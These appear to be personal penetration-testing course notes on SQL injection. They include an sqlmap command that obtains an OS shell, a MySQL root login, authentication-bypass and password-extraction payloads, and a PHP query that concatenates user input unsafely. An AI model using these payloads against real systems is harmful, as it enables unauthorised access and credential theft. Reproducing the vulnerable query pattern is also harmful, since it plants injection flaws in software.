SELECT * FROM users WHERE user_name='leon'

Listing 1 - SQL query that parses the users table

• Sql commands
• Windows (MSSQL) connection over Kali
• Use mysql -u root -proot -h 192.168.248.16 -P 3306 ( no space for pass if its not accepting with space)
• We can get to shell when a parameter is injectable using sqlmap ;

sqlmap -r sq1.txt -p height --os-shell

BASIC PAYLOADS:

• offsec' OR 1=1 -- // (SELECT * FROM users WHERE user_name= 'offsec' OR 1=1 —)

• ' or 1=1 in (select @@version) -- // (in input fields)

• ' OR 1=1 in (SELECT * FROM users) -- //

• ' or 1=1 in (SELECT password FROM users) -- //

• ' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

UNION BASED PAYLOADS:

• $query = "SELECT * from customers WHERE name LIKE '".$_POST["search_input"]."%'";
• ' ORDER BY 1-- //